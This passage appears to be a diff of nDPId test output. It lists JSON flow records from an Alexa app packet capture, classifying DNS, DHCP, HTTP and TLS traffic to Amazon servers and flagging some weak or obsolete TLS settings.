+00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976076275,"flow_last_seen":1490976077663,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} 
+00928{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976187511,"flow_last_seen":1490976190310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9181,"flow_avg_l4_payload_len":437,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976089173,"flow_last_seen":1490976090510,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} 
00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976089173,"flow_last_seen":1490976090510,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1490976186884,"flow_last_seen":1490976197347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":15483,"flow_avg_l4_payload_len":469,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976089426,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6884,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13077,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1490976186884,"flow_last_seen":1490976197347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":15483,"flow_avg_l4_payload_len":469,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976089426,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} 
+00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6884,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13077,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976107366,"flow_last_seen":1490976110047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976107366,"flow_last_seen":1490976110047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1490976107455,"flow_last_seen":1490976110047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":31431,"flow_avg_l4_payload_len":320,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1490976130073,"flow_last_seen":1490976134134,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8590,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":41,"flow_first_seen":1490976136930,"flow_last_seen":1490976140745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13686,"flow_avg_l4_payload_len":333,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976142629,"flow_last_seen":1490976148981,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3595,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027514,"flow_last_seen":1490976027560,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976115835,"flow_last_seen":1490976115901,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1490976076042,"flow_last_seen":1490976177233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3494,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976196942,"flow_last_seen":1490976198168,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11051,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976197297,"flow_last_seen":1490976198043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9036,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
-01043{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976071392,"flow_last_seen":1490976176431,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5656,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976031581,"flow_last_seen":1490976031687,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} 
-00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976107217,"flow_last_seen":1490976107359,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976195983,"flow_last_seen":1490976196942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13938,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":350,"flow_first_seen":1490976195984,"flow_last_seen":1490976198040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":248700,"flow_avg_l4_payload_len":710,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1490976195985,"flow_last_seen":1490976196943,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15782,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976177026,"flow_last_seen":1490976177105,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027724,"flow_last_seen":1490976027725,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024847,"flow_last_seen":1490976024848,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1490976195529,"flow_last_seen":1490976198776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":34748,"flow_avg_l4_payload_len":534,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":56,"flow_first_seen":1490976085644,"flow_last_seen":1490976098828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":21353,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976085829,"flow_last_seen":1490976088478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4344,"flow_avg_l4_payload_len":188,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976085832,"flow_last_seen":1490976088478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2595,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1490976107455,"flow_last_seen":1490976110047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":31431,"flow_avg_l4_payload_len":320,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1490976130073,"flow_last_seen":1490976134134,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8590,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 